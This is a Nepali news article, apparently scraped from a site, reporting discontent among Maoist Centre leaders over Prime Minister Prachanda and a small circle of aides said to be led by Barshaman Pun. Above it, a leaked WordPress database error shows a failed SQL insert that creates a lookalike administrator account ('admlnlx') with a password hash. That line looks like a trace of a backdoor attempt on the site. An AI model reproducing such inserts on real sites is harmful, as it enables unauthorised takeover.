WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BtEEM4FSXl5.zFoc6dl9ECYt.HS2AL1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-22 16:15:03', '', 'admlnlx', 'admlnlx')
काठमाडौं, माघ १७ –
प्रधानमन्त्री पुष्पकमल दाहाल प्रचण्डप्रति माओवादी केन्द्रकै नेताहरु असन्तुष्ट देखिएका छन् ।
प्रधानमन्त्री प्रचण्ड सानो घेरामा सीमित रहेको, स्वार्थका निर्णणहरु गराउन सो घेरा क्रियाशील रहेको, प्रधानमन्त्रीले सबै नेताहरुलाई समेट्न नसकेकोलगायतका कारण देखाउँदै माओवादी केन्द्रका शीर्षस्थ नेताहरु उनीसँग असन्तुष्ट भएका छन् ।
सरकार सञ्चालनसँग सम्बन्धित निर्णयहरु बन्द कोठामा बसेर तय गर्ने र पत्रपत्रिकामा आएपछि मात्र नेताहरुले थाहा पाउने गरेको गुनासो माओवादी केन्द्रका सबै पंक्तिमा व्यापक बनाइएको छ ।
‘कतिपय मन्त्रीहरुले समेत सरकारका निर्णयहरु धेरै पछि थाहा पाउने र मन्त्रीले एउटा तयारी गरे पनि त्यो तयारीअनुरुप नभई प्रधानमन्त्री वरिपरि रहेको सानो घेराले आफ्नो स्वार्थ पूरा गराउने तगरी निर्णय गराउन बाध्य बनाउने गरेको छ,’ माओवादीका एक नेताको हवाला दिँदै तरुण साप्ताहिकले खबर लेखेको छ ।
गुटहरुको महासंघ जस्तो देखिएको माओवादीमा फरक फरक गुटको फरक फरक स्वार्थ सम्बोधन गर्न नसक्दा प्रचण्ड पनि सानो घेरामा मात्र विश्वास गर्न बाध्य रहेको गुनासो प्रधानमन्त्रीकै सचिवालयले गर्ने गरेको छ ।
तर, अरु नेताहरु भने अन्य कारण देखाएर प्रधानमन्त्री निकट केही व्यक्तिहरु र सचिवालयका केही मात्र आफ्नो स्वार्थ पूरा गरिरहेको आरोप निरन्तर लगाइरहेका छन् । प्रधानमन्त्री प्रचण्डलाई सानो घेरामा पार्ने कामको नेतृत्व नेता वर्षमान पुनले गरेको बताइन्छ । छायाँ प्रधानमन्त्री जसरी प्रस्तुत हुने पुनमाथि क्षेत्र, जाति र स्वार्थ मात्र हेर्ने गरेको आरोप लाग्ने गरेको छ ।
पुनले प्रधानमन्त्रीलाई सबैको प्रधानमन्त्री हो भन्ने अनुभव हुने गरी काम गर्न नदिएको उनीहरुको आरोप छ । ठूला निर्णय गर्दा सुटुक्क गर्न बाध्य पार्ने पुनले अन्य नेताहरुले सानो काम भने पनि त्यसको ठूलो हल्ला गराउने र फलानो नेताले यस्तो काम भनेको छ भनेर केही दिन काम अड्काई त्यो काम नै विवादमा पार्ने गरेका छन् । काम गर्दा पनि फलानो नेताले फलानो काम गरायो भनेर कार्यकर्ता पंक्तिसम्म हल्ला गराउने गरेका छन् ।
न्यायाधीश नियुक्तिमा पनि पुनले ठूलो स्वार्थ पूरा गरेर एमालेका पार्टी सदस्यहरुलाई नियुक्ति गरेका थिए । पुनको नेतृत्वमा रहेको घेरामा सभामुख घर्ती, प्रधानमन्त्री पुत्र प्रकाश दाहाल, राजनीतिक सल्लाहकार चन्द्रदेव खनाल, प्रशासनिक सल्लाहकार नारायण दाहाल, प्रमुख स्वकीय सचिव जोखबहादुर महरा, स्वकीय सचिव रमेश मल्ल, प्रेस सल्लाहकार गोविन्द आचार्यलगायतका थोरै व्यक्तिहरु छन् ।
पुनले प्रत्येक व्यक्तिलाई निश्चित जिम्मेवारी दिएर आफूमा सूचना केन्द्रित गर्ने र राज्य सञ्चालनमा हस्तक्षेप गर्ने गरेका छन् । राजनिितक सल्लाहकार खनालले अन्य नेताहरुले गरेको सिफारिस हेरी छलफल गरेर विवादमा पार्ने जिम्मेवारी लिएका छन् । त्यही कारण केही दिनअघि मात्र खनाल र नारायणकाजी श्रेष्ठबीच तँ तँ र म म भन्ने तहमा झरेर विवाद भएको स्वयं खनालले नै अन्य नेताहरुलाई बताउने गरेका छन् । तरुण साप्ताहिकमा खबर छ ।